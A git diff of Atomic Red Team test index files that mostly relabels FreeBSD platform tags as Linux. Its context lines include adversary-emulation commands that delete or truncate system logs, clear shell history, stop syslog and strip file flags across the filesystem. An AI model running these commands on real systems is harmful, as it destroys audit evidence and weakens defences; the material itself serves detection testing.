Linux & MacOS [freebsd, linux, macos] + - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos] - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos] + - Atomic Test #1: Process Discovery - ps [linux, macos] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) - - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux] + - Atomic Test #1: Permission Groups Discovery (Local) [linux, macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #8: Examine password policy - macOS [macos] - T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -609,8 +609,8 @@ - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #3: Security Software Discovery - ps (macOS) [macos] - [T1018 Remote System Discovery](../../T1018/T1018.md) - - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos] - - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos] + - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] + - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - [T1046 Network Service Discovery](../../T1046/T1046.md) - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] @@ -648,24 +648,24 @@ - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1496 Resource Hijacking](../../T1496/T1496.md) - - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux] + - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos] - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos] + - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux] + - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos] # execution - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) @@ -684,8 +684,8 @@ - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) - - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos] - - Atomic Test #2: Command-Line Interface [freebsd, linux, macos] + - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos] + - Atomic Test #2: Command-Line Interface [linux, macos] - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -733,19 +733,19 @@ - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) - - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd] + - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux] - T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] - - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux] + - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux] - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd] + - Atomic Test #1: Data Transfer Size Limits [macos, linux] - T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e21947ff75..b085bcbdec 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -968,9 +968,9 @@ - Atomic Test #1: Simulate Patching termsrv.dll [windows] - Atomic Test #2: Modify Terminal Services DLL Path [windows] - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows] - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e7d0d73575..0837299458 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1037,7 +1037,7 @@ defense-evasion: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -1311,9 +1311,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -1335,9 +1334,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1359,9 +1357,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -1383,9 +1380,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -1460,9 +1456,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -1523,7 +1518,7 @@ defense-evasion: Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_modify: description: Path of the file @@ -1572,7 +1567,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: source_file: description: Path of c source file @@ -1636,7 +1631,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: source_file: description: Path of c source file @@ -3164,7 +3159,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -3203,7 +3198,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -3242,7 +3237,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -3852,7 +3847,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -4787,7 +4781,7 @@ defense-evasion: Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -4938,7 +4932,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | rm -rf /var/log/messages @@ -4997,7 +4991,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate --size=0 /var/log/security #size parameter \n" @@ -5042,7 +5036,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | cat /dev/null > /var/log/messages #truncating the file to zero bytes @@ -5116,7 +5110,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'echo '''' > /var/log/messages @@ -5172,7 +5166,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'unlink /var/log/messages @@ -7414,7 +7408,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'rm ~/.sh_history @@ -7438,7 +7432,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'echo "" > ~/.sh_history @@ -7463,7 +7457,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'cat /dev/null > ~/.sh_history @@ -7488,7 +7482,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'ln -sf /dev/null ~/.sh_history @@ -7512,7 +7506,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: 'truncate -s0 ~/.sh_history @@ -7540,7 +7534,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | unset HISTFILE @@ -7618,7 +7612,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependencies: - description: 'Install sshpass and create user account used for excuting @@ -7961,7 +7955,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -7999,7 +7992,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -8067,7 +8059,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: message: description: Message to print to the screen @@ -8098,7 +8090,7 @@ defense-evasion: Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. \n" supported_platforms: - - linux:freebsd + - linux input_arguments: bash_encoded: description: Encoded @@ -8141,7 +8133,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9755,7 +9746,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9787,7 +9777,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9822,7 +9811,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -9849,7 +9837,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -11175,7 +11162,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if pfctl is installed on the machine. @@ -11283,7 +11270,7 @@ defense-evasion: description: "Add and delete a rule on the Packet Filter (PF) if installed and enabled. \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if pf is installed on the machine and enabled. @@ -13706,9 +13693,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -13741,9 +13727,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -14938,7 +14923,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: payload: description: hello.c payload @@ -14986,7 +14971,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag @@ -15031,7 +15016,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag @@ -15100,7 +15085,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -15114,7 +15098,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -16041,7 +16024,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: auditd_config_file_name: description: The name of the auditd configuration file to be changed @@ -16105,7 +16088,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: syslog_config_file_name: description: The name of the syslog configuration file to be changed @@ -18898,7 +18881,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: evil_command: description: Command to run after shell history collection is disabled @@ -18997,7 +18980,7 @@ defense-evasion: Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -19036,7 +19019,7 @@ defense-evasion: Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -20688,7 +20671,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | service syslogd stop @@ -21582,7 +21565,6 @@ defense-evasion: as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n" supported_platforms: - - linux:freebsd - linux executor: command: "swapon -a \nsleep 2\nswapoff -a\nsync\n" @@ -22425,7 +22407,7 @@ defense-evasion: a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand uname -v\n" supported_platforms: - - linux:freebsd + - linux input_arguments: shell_command: description: command to encode @@ -23742,7 +23724,6 @@ defense-evasion: Upon successful execution, sh is renamed to `crond` and executed. supported_platforms: - - linux:freebsd - linux executor: command: | @@ -24702,7 +24683,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux input_arguments: cert_filename: description: Path of the CA certificate we create @@ -25021,7 +25002,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -25053,7 +25033,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -25084,7 +25063,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27350,7 +27328,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27388,7 +27365,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -27577,7 +27553,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: command: | chflags -R 0 / @@ -28397,7 +28373,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir @@ -29406,7 +29382,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -31261,7 +31236,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -31302,7 +31277,7 @@ defense-evasion: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -31344,7 +31319,7 @@ defense-evasion: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -33926,7 +33901,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -33965,7 +33940,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -34004,7 +33979,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if sudo is installed. @@ -35196,9 +35171,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -35256,7 +35230,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -38063,7 +38037,7 @@ privilege-escalation: Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -38106,7 +38080,7 @@ privilege-escalation: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -38865,7 +38839,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: payload: description: hello.c payload @@ -38913,7 +38887,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag @@ -38958,7 +38932,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag @@ -39027,7 +39001,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -39041,7 +39014,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -43596,7 +43568,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command_to_add: description: Command to add to the .shrc file @@ -43617,7 +43589,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -43640,7 +43611,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -45568,7 +45538,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -45864,7 +45834,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: rc_service_path: description: Path to rc service file @@ -47322,7 +47292,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -47866,7 +47836,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -47907,7 +47877,7 @@ privilege-escalation: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -47949,7 +47919,7 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -50010,9 +49980,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -50070,7 +50039,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -53084,7 +53053,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -53109,7 +53077,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -53203,7 +53170,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53223,7 +53189,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53241,7 +53206,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53256,7 +53220,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -53290,7 +53253,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -53337,7 +53300,7 @@ execution: with a /bin/sh shell, changes the users shell to sh, then deletes the art user. \n" supported_platforms: - - linux:freebsd + - linux dependencies: - description: 'chsh - change login shell, must be installed @@ -53389,7 +53352,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: false @@ -53450,7 +53413,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: remote_url: description: url of remote payload @@ -54089,7 +54052,6 @@ execution: description: Download and execute shell script and write to file then execute locally using Python -c (command mode) supported_platforms: - - linux:freebsd - linux input_arguments: script_url: @@ -54131,7 +54093,6 @@ execution: description: Create Python file (.py) that downloads and executes shell script via executor arguments supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -54189,7 +54150,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -54254,7 +54214,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux dependencies: - description: 'Verify if python is in the environment variable path and attempt @@ -55573,7 +55532,7 @@ execution: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -56632,7 +56591,7 @@ persistence: Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - - linux:freebsd + - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. @@ -58667,9 +58626,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -58727,7 +58685,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command: description: Command to execute @@ -60348,7 +60306,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -60366,7 +60323,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -60383,7 +60339,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos @@ -62672,7 +62627,7 @@ persistence: Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -62715,7 +62670,7 @@ persistence: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: 'Check if bash is installed. @@ -63061,7 +63016,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: username: description: Username of the user to create @@ -63184,7 +63139,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: username: description: Username of the user to create @@ -64042,9 +63997,8 @@ persistence: persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n" supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: name: sh elevation_required: false @@ -70371,7 +70325,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: command_to_add: description: Command to add to the .shrc file @@ -70392,7 +70346,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -70415,7 +70368,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -72694,7 +72646,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -73032,7 +72984,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: rc_service_path: description: Path to rc service file @@ -74533,7 +74485,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux input_arguments: time_spec: description: Time specification of when the command should run @@ -75168,7 +75120,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75209,7 +75161,7 @@ persistence: the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.\n" supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75251,7 +75203,7 @@ persistence: ' supported_platforms: - - linux:freebsd + - linux executor: name: sh elevation_required: true @@ -75631,7 +75583,7 @@ command-and-control: ' supported_platforms: - - linux:freebsd + - linux input_arguments: destination_url: description: Destination URL to post encoded data. @@ -77896,7 +77848,7 @@ command-and-control: with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n" supported_platforms: - - linux:freebsd + - linux dependency_executor_name: sh dependencies: - description: "Tor must be installed on the machine \n" @@ -78050,7 +78002,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78810,7 +78761,6 @@ command-and-control: This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78899,7 +78849,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78939,7 +78888,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -78978,7 +78926,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79009,7 +78956,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79040,7 +78986,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79071,7 +79016,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79280,7 +79224,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -79937,9 +79880,8 @@ command-and-control: Note that this test may conflict with pre-existing system configuration. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: proxy_server: description: Proxy server URL (host:port) @@ -80502,7 +80444,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -80532,7 +80473,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -80569,9 +80509,8 @@ collection: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: test_folder: description: Path used to store files. @@ -80789,7 +80728,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux input_arguments: output_file: description: Output file path @@ -80851,7 +80790,7 @@ collection: ' supported_platforms: - - linux:freebsd + - linux 